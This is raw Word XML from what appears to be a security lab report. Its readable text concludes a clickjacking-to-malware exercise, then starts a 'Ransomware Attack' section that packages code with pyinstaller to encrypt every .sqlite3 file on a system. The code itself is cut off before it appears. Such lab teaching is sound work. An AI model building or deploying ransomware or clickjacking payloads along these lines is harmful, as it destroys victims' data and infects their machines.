                <v:shape id="Picture 5294" o:spid="_x0000_s1322"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3MIxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvQv9DeAUvUrNVW+zWKGVB8NJDVy0eH5vXzdLNy5LEdf33plDwOMzMN8xqM9hW9ORD41jB8zQD&#10;QVw53XCt4LDfPi1BhIissXVMCq4UYLN+GK0w1+7CX9SXsRYJwiFHBSbGLpcyVIYshqnriJP347zF&#10;mKSvpfZ4SXDbylmWvUqLDacFgx0Vhqrf8mwVhP7kTbkrvo+H+eKzmU+u3TEWSo0fh493EJGGeA//&#10;t3dawcvsbQF/b9ITkOsbAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGCbcwjHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId112" o:title=""/>
                </v:shape>
                <v:shape id="Shape 5295" o:spid="_x0000_s1323"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HLxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hPMGbptZVtBpFdt1lj/4D8fZonm2xeSlNtPXbm4UFj8PM/IZZrltTigfVrrCsYDSMQBCn&#10;VhecKTgdvwczEM4jaywtk4InOVivup0lJto2vKfHwWciQNglqCD3vkqkdGlOBt3QVsTBu9raoA+y&#10;zqSusQlwU8o4iqbSYMFhIceKPnNKb4e7UbBt4rO/7H5us9HV6uoj++Lx7qhUv9duFiA8tf4d/m//&#10;agWTeD6BvzfhCcjVCwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABF7wcvEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C3C03F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If the binary data is changed with the binary data of a virus or any other </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>malware ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on opening it could easily harm the user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB2F43F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1550FA0B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Conclusion :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hence Successfully demonstrated how to perform clickjacking to infect a user with a Malware </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9533B6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEDC468" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689483D9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24931345" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39570613" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A90CFBB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E280E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D362E1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19479292" wp14:editId="69CE9D77">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="43546" name="Group 4354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60" name="Shape 499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1" name="Shape 499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62" name="Shape 499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3" name="Shape 499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64" name="Shape 499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46" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49965" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49966" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49967" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49968" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4996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20704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="367BC170" wp14:editId="44B8AC0C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="43547" name="Group 4354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70" name="Shape 499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1" name="Shape 499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2" name="Shape 499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3" name="Shape 499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4" name="Shape 499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47" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49975" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49976" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49977" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49978" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 499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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0284F14A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41294E8D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B75E4B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA959A2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E07564" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7204597D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE9FA49" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A338F52" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E1D99" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33924422" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4CA61E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D979A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:ind w:right="8878"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FDCC74" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:right="3583" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ransomware Attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99725B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="471" w:right="98" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Step 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">: install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>pyinstaller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> to convert python code to application file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C4DC55" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="821" w:right="98" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Convert the following code to encrypt all the files with .sqlite3 extension in the system into application using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>pyinstaller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15458977" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="461" w:right="383"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BAD1156" wp14:editId="397F0D4C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="46829" name="Group 46829"/>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80" name="Shape 499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81" name="Shape 499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82" name="Shape 499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83" name="Shape 499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84" name="Shape 499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29" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49985" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49986" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49987" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49988" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4998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2752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A2DFC97" wp14:editId="314020D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="46830" name="Group 4683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49990" name="Shape 499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1" name="Shape 499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92" name="Shape 499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3" name="Shape 499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94" name="Shape 499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30" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49995" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49996" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49997" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49998" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4999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rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8128" w:type="dxa"/>
        <w:tblInd w:w="1152" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="38" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F97B52" w14:paraId="11DA4B4F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="5927"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="27B752E1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
